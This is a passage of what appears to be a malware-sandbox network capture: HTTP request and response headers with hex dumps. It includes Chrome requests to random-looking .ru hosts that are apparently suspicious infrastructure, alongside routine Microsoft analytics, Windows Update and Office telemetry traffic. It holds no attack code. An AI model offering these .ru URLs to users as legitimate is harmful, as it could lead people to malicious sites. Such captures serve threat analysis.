                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:35:07 UTC379INHTTP/1.1 404 Not Found
                                                  Date: Mon, 09 Dec 2024 08:35:07 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 7
                                                  Connection: close
                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  cf-chl-out: 7KVhGVwmNZbj1cL60QQiVvUwnJU5khJ6mEs=$69LP4EgPpihXJJ2r
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a8f5ce6a41d2-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:35:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                  Data Ascii: invalid


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.449777172.67.139.114435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:09 UTC673OUTGET /hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREY HTTP/1.1
                                                  Host: cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Origin: https://or.smelsgycz.ru
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Referer: https://or.smelsgycz.ru/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:35:10 UTC902INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fLAAeJ9%2BvmWfABAsNVfHscxhMqArhahjYrtpCE3agfo1mL4O5XwIsWqrAJKJvFD8JqDmG3snf%2FskCj9Fn0LwBewD6V%2FRvL5s75rUa%2BOByVqaT9MJq0b7PpmIvmBH5z1Mnn2LS%2FUgfrMt8G3pZVKMfaGO2vgBCTxQFNhvxqpjggLda7%2BV5TYHcdWxyXqqFkiMFs6RD3mAQq4VVpQ%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a8ffecfd430e-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1711&rtt_var=651&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1251&delivery_rate=1668571&cwnd=179&unsent_bytes=0&cid=dc16530c8552a1d9&ts=860&x=0"
                                                  2024-12-09 08:35:10 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                  Data Ascii: 11
                                                  2024-12-09 08:35:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  29192.168.2.449781104.21.32.2514435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:12 UTC469OUTGET /hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREY HTTP/1.1
                                                  Host: cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:35:13 UTC900INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJoG4fh8xLfK0zNDOLTW1W49o7zLctFAq5fi7kpBWPbq5RiBUj8tyx%2B1IoDeuFjeU5ss2KpUM7PLyjzYeHedXzKWUW16WX6f2S9Pn0ZMhWpkL2yXF4ZjKY6ZqG81Nk3L1ZgE40w2g4if2CPCl4x3TOLgJUjv%2BcxJj7w2xMB2dmlsdgWK0hVKvYGD%2FND24xj6CtFK5ec4Um%2F%2BHbM%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a9159e97c335-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1488&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1047&delivery_rate=1921052&cwnd=165&unsent_bytes=0&cid=7719705092f134f6&ts=869&x=0"
                                                  2024-12-09 08:35:13 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                  Data Ascii: 11
                                                  2024-12-09 08:35:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.44978613.107.246.634435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:19 UTC567OUTGET /scripts/c/ms.analytics-web-3.2.12.min.js HTTP/1.1
                                                  Host: js.monitor.azure.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://developer.microsoft.com/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:35:20 UTC797INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:20 GMT
                                                  Content-Type: text/javascript; charset=utf-8
                                                  Content-Length: 140189
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=31536000, immutable, no-transform
                                                  Last-Modified: Wed, 24 May 2023 19:47:31 GMT
                                                  ETag: 0x8DB5C8FB67C42C8
                                                  x-ms-request-id: 7661e183-801e-005a-3415-4aa638000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-meta-jssdkver: 3.2.12
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241209T083519Z-r1cf579d7789jf56hC1EWRu5880000000300000000002tmx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:20 UTC15587INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 20 53 44 4b 20 41 6e 61 6c 79 74 69 63 73 20 57 65 62 2c 20 33 2e 32 2e 31 32 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 75 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 73 3d 22 6f 62 6a 65 63 74 22 2c 66 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 66 3d 22 70 72 6f 74 6f 74 79 70 65 22 2c 6c 3d 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 67 3d
                                                  Data Ascii: /*! * 1DS JS SDK Analytics Web, 3.2.12 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */var e=this,t=function(n){"use strict";var u="function",s="object",fe="undefined",f="prototype",l="hasOwnProperty",g=
                                                  2024-12-09 08:35:20 UTC16384INData Raw: 79 7b 72 65 74 75 72 6e 20 6a 69 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 31 7d 63 61 74 63 68 28 69 29 7b 7d 7d 28 74 2c 65 2e 69 64 2c 6e 29 26 26 28 74 5b 65 2e 69 64 5d 3d 6e 29 7d 63 61 74 63 68 28 69 29 7b 7d 7d 72 65 74 75 72 6e 20 6e 7d 28 61 2c 65 29 29 5b 78 74 28 74 29 5d 3d 6e 29 2c 6e 29 7d 2c 6b 69 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 26 26 65 5b 74 5d 29 74 72 79 7b 64 65 6c 65 74 65 20 65 5b 74 5d 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 7d 3b 72 65 74 75 72 6e 20 61 7d 76 61 72 20 65 72 3d 22 74 6f 47 4d 54 53 74 72 69 6e 67 22 2c 74 72 3d 22 74 6f 55 54 43 53 74 72 69 6e 67 22 2c 6e 72 3d 22 63 6f 6f 6b 69 65 22 2c 69 72
                                                  Data Ascii: y{return ji(e,t,{value:n,enumerable:!1,configurable:!0}),1}catch(i){}}(t,e.id,n)&&(t[e.id]=n)}catch(i){}}return n}(a,e))[xt(t)]=n),n)},kill:function(e,t){if(e&&e[t])try{delete e[t]}catch(n){}}};return a}var er="toGMTString",tr="toUTCString",nr="cookie",ir
                                                  2024-12-09 08:35:20 UTC16384INData Raw: 5b 69 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 7d 2c 65 29 29 2c 76 5b 4d 61 5d 3d 72 29 2c 72 7d 2c 76 5b 67 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 26 26 72 5b 67 65 5d 28 65 29 7d 2c 76 5b 76 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 26 26 72 5b 76 65 5d 28 65 29 7d 2c 76 2e 67 65 74 43 6f 6f 6b 69 65 4d 67 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 3d 69 7c 7c 6d 72 28 54 2c 76 5b 59 5d 29 7d 2c 76 2e 73 65 74 43 6f 6f 6b 69 65 4d 67 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 3d 65 7d 2c 76 5b 63 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 7c 7c 61 7c 7c 24 74 28 54 2e 65 6e 61 62 6c 65 50 65 72 66 4d 67 72 29 26 26 47 28 65 3d 24 74 28 54 5b 4a 65 5d 29 29 26 26 28
                                                  Data Ascii: [it]=function(e,t){},e)),v[Ma]=r),r},v[ge]=function(e){r&&r[ge](e)},v[ve]=function(e){r&&r[ve](e)},v.getCookieMgr=function(){return i=i||mr(T,v[Y])},v.setCookieMgr=function(e){i=e},v[ct]=function(){var e;return n||a||$t(T.enablePerfMgr)&&G(e=$t(T[Je]))&&(
                                                  2024-12-09 08:35:20 UTC16384INData Raw: 2c 21 30 29 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 69 74 65 6d 3a 72 7d 7d 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 73 63 28 65 2c 74 2c 6e 2c 69 29 7b 69 66 28 69 26 26 65 29 7b 76 61 72 20 72 3d 54 6f 28 69 2e 76 61 6c 75 65 2c 69 2e 6b 69 6e 64 2c 69 2e 70 72 6f 70 65 72 74 79 54 79 70 65 29 3b 69 66 28 2d 31 3c 72 29 7b 76 61 72 20 61 3d 65 5b 72 63 5d 2c 6f 3d 28 6f 3d 28 61 3d 61 7c 7c 28 65 5b 72 63 5d 3d 7b 66 3a 7b 7d 7d 29 29 5b 61 63 5d 29 7c 7c 28 61 5b 61 63 5d 3d 7b 7d 29 3b 69 66 28 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 74 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 76 61 72 20 75 3d 74 5b 63 5d 2c
                                                  Data Ascii: ,!0),JSON.stringify(e)},function(){return{item:r}})}catch(e){return null}}})}function sc(e,t,n,i){if(i&&e){var r=To(i.value,i.kind,i.propertyType);if(-1<r){var a=e[rc],o=(o=(a=a||(e[rc]={f:{}}))[ac])||(a[ac]={});if(t)for(var c=0;c<t.length;c++)var u=t[c],
                                                  2024-12-09 08:35:20 UTC16384INData Raw: 29 2c 6f 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 63 6f 72 65 43 6f 6e 66 69 67 3a 63 2c 63 6f 72 65 3a 75 2c 65 78 74 65 6e 73 69 6f 6e 73 3a 73 7d 7d 29 7d 2c 6c 2e 70 72 6f 63 65 73 73 54 65 6c 65 6d 65 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4e 6f 28 65 2c 6c 2e 69 64 65 6e 74 69 66 69 65 72 29 3b 76 61 72 20 6e 3d 28 74 3d 6c 2e 5f 67 65 74 54 65 6c 43 74 78 28 74 29 29 2e 67 65 74 45 78 74 43 66 67 28 6c 2e 69 64 65 6e 74 69 66 69 65 72 29 2c 69 3d 21 21 77 2e 64 69 73 61 62 6c 65 54 65 6c 65 6d 65 74 72 79 3b 28 6e 3f 69 7c 7c 6e 2e 64 69 73 61 62 6c 65 54 65 6c 65 6d 65 74 72 79 3a 69 29 7c 7c 52 7c 7c 28 77 5b 41 63 5d 26 26 28 65 2e 69 4b 65 79 3d 77 5b 41 63 5d 29 2c 6e 26 26 6e 5b 41 63 5d 26 26 28 65 2e 69
                                                  Data Ascii: ),o}},function(){return{coreConfig:c,core:u,extensions:s}})},l.processTelemetry=function(e,t){No(e,l.identifier);var n=(t=l._getTelCtx(t)).getExtCfg(l.identifier),i=!!w.disableTelemetry;(n?i||n.disableTelemetry:i)||R||(w[Ac]&&(e.iKey=w[Ac]),n&&n[Ac]&&(e.i
                                                  2024-12-09 08:35:20 UTC16384INData Raw: 26 26 74 2e 73 65 74 54 72 61 63 65 43 74 78 28 6f 2e 67 65 74 54 72 61 63 65 43 74 78 28 29 29 7d 2c 61 2e 70 72 6f 63 65 73 73 54 65 6c 65 6d 65 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4e 6f 28 65 2c 61 2e 69 64 65 6e 74 69 66 69 65 72 29 2c 74 3d 61 2e 5f 67 65 74 54 65 6c 43 74 78 28 74 29 3b 76 61 72 20 6e 2c 69 2c 72 3d 65 2e 65 78 74 3d 65 2e 65 78 74 7c 7c 7b 7d 3b 65 2e 64 61 74 61 3d 65 2e 64 61 74 61 7c 7c 7b 7d 2c 74 65 28 42 75 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 5b 65 5d 3d 72 5b 65 5d 7c 7c 7b 7d 7d 29 2c 6f 26 26 28 6f 2e 61 70 70 6c 79 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6e 74 65 78 74 28 65 29 2c 6f 2e 61 70 70 6c 79 55 73 65 72 43 6f 6e 74 65 78 74 28 65 29 2c 6f 2e 61 70 70 6c 79 57 65 62 43 6f 6e 74 65 78 74 28
                                                  Data Ascii: &&t.setTraceCtx(o.getTraceCtx())},a.processTelemetry=function(e,t){No(e,a.identifier),t=a._getTelCtx(t);var n,i,r=e.ext=e.ext||{};e.data=e.data||{},te(Bu,function(e){r[e]=r[e]||{}}),o&&(o.applyApplicationContext(e),o.applyUserContext(e),o.applyWebContext(
                                                  2024-12-09 08:35:20 UTC16384INData Raw: 75 6c 6c 2c 6e 3d 72 2e 73 6c 69 63 65 28 30 29 2c 72 3d 5b 5d 2c 74 65 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 29 7d 29 29 7d 7d 29 7d 76 61 72 20 62 66 3d 33 36 65 35 2c 43 66 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 61 64 73 62 6f 74 2d 67 6f 6f 67 6c 65 22 2c 22 61 70 69 73 2d 67 6f 6f 67 6c 65 22 2c 22 6d 65 64 69 61 70 61 72 74 6e 65 72 73 2d 67 6f 6f 67 6c 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 45 66 28 29 7b 76 61 72 20 65 3d 63 69 28 29 3b 72 65 74 75 72 6e 20 65 26 26 21 21 65 2e 74 69 6d 69 6e 67 7d 66 75 6e 63 74 69 6f 6e 20 53 66 28 29 7b 76 61 72 20 65 3d 63 69 28 29 2c 65 3d 65 3f 65 2e 74 69 6d 69 6e 67 3a 30 3b 72 65 74 75 72 6e 20 65 26 26 30 3c 65 2e 64 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 53 74 61 72 74 26 26 30 3c 65 5b 73
                                                  Data Ascii: ull,n=r.slice(0),r=[],te(n,function(e){e()}))}})}var bf=36e5,Cf=["googlebot","adsbot-google","apis-google","mediapartners-google"];function Ef(){var e=ci();return e&&!!e.timing}function Sf(){var e=ci(),e=e?e.timing:0;return e&&0<e.domainLookupStart&&0<e[s
                                                  2024-12-09 08:35:20 UTC16384INData Raw: 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 61 3b 65 2e 76 65 72 3d 22 31 2e 30 22 2c 65 2e 69 64 3d 74 68 69 73 2e 5f 69 64 2e 67 65 74 4c 61 73 74 50 61 67 65 56 69 65 77 49 64 28 29 2c 73 65 28 65 2e 6e 61 6d 65 29 7c 7c 28 65 2e 6e 61 6d 65 3d 28 6e 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2c 74 26 26 74 2e 70 61 67 65 4e 61 6d 65 3f 74 2e 70 61 67 65 4e 61 6d 65 3a 6e 2e 63 61 6c 6c 62 61 63 6b 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 2e 63 61 6c 6c 62 61 63 6b 2e 70 61 67 65 4e 61 6d 65 3f 6e 2e 63 61 6c 6c 62 61 63 6b 2e 70 61 67 65 4e 61 6d 65 28 29 3a 6e 2e 63 6f 72 65 44 61 74 61 26 26 6e 2e 63 6f 72 65 44 61 74 61 2e 70 61 67 65 4e 61 6d 65 3f 6e 2e 63 6f 72 65 44 61 74 61 2e 70 61 67 65 4e 61 6d 65 3a 28 74 3d 28 28 6f 69 28 29
                                                  Data Ascii: ){var n,i,r,a;e.ver="1.0",e.id=this._id.getLastPageViewId(),se(e.name)||(e.name=(n=this._config,t&&t.pageName?t.pageName:n.callback&&"function"==typeof n.callback.pageName?n.callback.pageName():n.coreData&&n.coreData.pageName?n.coreData.pageName:(t=((oi()
                                                  2024-12-09 08:35:20 UTC9914INData Raw: 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 74 65 6d 70 6c 61 74 65 4e 61 6d 65 29 2c 63 6f 6e 74 65 6e 74 53 6f 75 72 63 65 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 68 69 73 2e 5f 63 6f 6e 74 65 6e 74 42 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 63 6f 6e 74 65 6e 74 53 6f 75 72 63 65 29 2c 70 72 6f 64 75 63 74 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 68 69 73 2e 5f 63 6f 6e 74 65 6e 74 42 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 70 72 6f 64 75 63 74 49 64 29 2c 74 79 70 65 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 68 69 73 2e 5f 63 6f 6e 74 65 6e 74 42 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 63 6f 6e 74 65 6e 74 54 79 70 65 29 7d 7d 2c 4e 64 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 44 65 66 61 75 6c 74 43 6f 6e 74 65 6e
                                                  Data Ascii: lobFieldNames.templateName),contentSource:e.getAttribute(this._contentBlobFieldNames.contentSource),product:e.getAttribute(this._contentBlobFieldNames.productId),type:e.getAttribute(this._contentBlobFieldNames.contentType)}},Nd.prototype._getDefaultConten


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  31192.168.2.44979120.109.210.53443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:22 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T+Z2Dp8e6KXcFyn&MD=v9ZYUKTR HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-12-09 08:35:22 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                  MS-CorrelationId: e276dab6-9341-4fd6-ba5f-471af664bfdf
                                                  MS-RequestId: 5cfb55e2-ba69-4906-b145-8b1cdf44a93f
                                                  MS-CV: Gb17Gnsr20K+EPQW.0
                                                  X-Microsoft-SLSClientCache: 1440
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Mon, 09 Dec 2024 08:35:21 GMT
                                                  Connection: close
                                                  Content-Length: 30005
                                                  2024-12-09 08:35:22 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                  2024-12-09 08:35:22 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  32192.168.2.44979413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:22 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:22 UTC492INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:22 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 218853
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public
                                                  Last-Modified: Sun, 08 Dec 2024 17:57:40 GMT
                                                  ETag: "0x8DD17B1CF2A0A7C"
                                                  x-ms-request-id: df7ee72c-101e-0034-6bad-4996ff000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083522Z-r1cf579d7786c2tshC1EWRr1gc00000007f00000000047xy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:22 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
